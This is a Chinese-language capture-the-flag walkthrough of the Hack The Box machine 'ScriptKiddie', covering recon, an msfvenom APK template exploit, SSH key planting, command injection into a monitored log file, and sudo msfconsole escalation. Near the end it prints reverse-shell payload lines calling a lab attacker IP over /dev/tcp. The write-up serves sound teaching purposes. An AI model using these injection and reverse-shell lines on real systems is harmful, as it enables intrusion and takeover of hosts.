HTB-ScriptKiddie

信息收集

nmap

5000端口如下。

测试nmap。

测试exploit。

测试sploits。

尝试绕过，开启与否的url编码前后一致。
目前没有发现有利用的地方，继续回到payloads继续测试。

现在payloads有三个可能存在漏洞的地方。

• windows template file
• linux template file
• apk template file
  分别使用搜索引擎。
  
  

比较在意其中APK的一个相关搜索结果。

msf也找到得到对应的。
看了一下会

随便换了个payload。

这个负载会生成一个apk文件，并且在payloads进行写入的时候，反手注入写入者一波。但是失败了。

又换了一个payload。

顺利利用。

开机

提权

有一个.sudo_as_admin_successful文件，但是是空的，它为什么会出现在这里。

sudo -l需要kid的密码，但是目前没有。

在.ssh文件里面找到了authorized_keys，此文件内一般会有用户密码，但是现在这个文件是空的,并且可以修改，所以可以选择修改文件使用ssh登录。来到了pwn用户目录。

有一个脚本，同样能够修改和执行，功能是什么呢。简单地说就是读取/home/kid/logs/hackers文件内容，并且经过一些处理后使用nmap扫描。

然后此应用是以pwn身份运行，可以在脚本后面加上一句反弹，就能收到pwn身份的shell了，注意这个脚本会一直循环读取hackers文件。

看来直接添加到scanlosers.sh文件是不行的所以来仔细看看这个脚本干了什么。
先给log赋一个文件的路径。切换到pwn用户根目录。

然后以' '为分隔符，留下第2个' '以后的所有字符，又以ascii码排序并去重，最后读取前面一系列操作后的结果作为ip变量的值。

再看看后面的代码，判断这个hackers文件行数是否大于0，是的话就给hackers文件一个不自动换行的参数-n，简单来说就是就是让hackers文件为空。

不出意外这样输入就能获得pwn的shell，但是我写不进去。

权限上又能写，什么情况呢。

写入前面的authorized_keys文件看看，这个文件能写入但是hackers为什么不能写入呢。

因为前面提到过authorized_keys文件会一直不停读取hackers文件，如果输入后行数大于0就会被执行脚本后立即清空。所以直接写进去应该就能读取了。

现在来构造一下语句，要通过cut和sort，就需要这样构造shell，;从左到右无论成功与否都会执行。

  127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1"
1

但是会报错重定向。

会不会是这后面导致重定向错误，反弹语句后面跟上注释符#试试。

  127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1" #
1

切换到pwn用户后，发现能用sudo运行msf。

可以看到使用sudo登陆的msf拥有root的权限。

正在sudo权限下的msf中反弹即可,也可以直接在msf中建了一个shell，使用bash应该就可以了。